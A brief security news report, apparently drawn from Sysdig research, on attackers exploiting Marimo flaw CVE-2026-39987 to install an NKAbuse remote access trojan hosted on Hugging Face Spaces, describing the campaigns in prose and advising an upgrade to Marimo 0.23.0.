Attackers are exploiting a critical Marimo remote code execution vulnerability tracked as CVE-2026-39987 to deliver a new variant of NKAbuse malware hosted on Hugging Face Spaces. The flaw enabled credential theft within ten hours of public disclosure, with Sysdig researchers observing additional campaigns beginning April 12 that abuse the AI platform's legitimate reputation to avoid detection. The attacker created a Space named vsccode-modetx containing a dropper script and a malware binary called kagent, which mimics a legitimate Kubernetes tool.
After gaining initial access through the Marimo vulnerability, the threat actor executes a curl command to download the script from Hugging Face, which installs the binary and establishes persistence via systemd, cron, or macOS LaunchAgent. The payload represents an undocumented NKAbuse variant that functions as a remote access trojan capable of executing shell commands and returning output to operators. The malware leverages NKN decentralized peer-to-peer network technology, WebRTC, and STUN for NAT traversal.
Other observed attacks include a Germany-based operator attempting fifteen reverse-shell techniques across multiple ports before pivoting to PostgreSQL credential extraction and database enumeration. A Hong Kong-based actor used stolen environment credentials to target Redis servers, dumping session tokens and application cache entries. Sysdig warns that exploitation of CVE-2026-39987 has increased significantly, urging users to upgrade to Marimo version 0.23.0 or later immediately. Those unable to upgrade should block external access to the vulnerable terminal endpoint entirely.
Read more...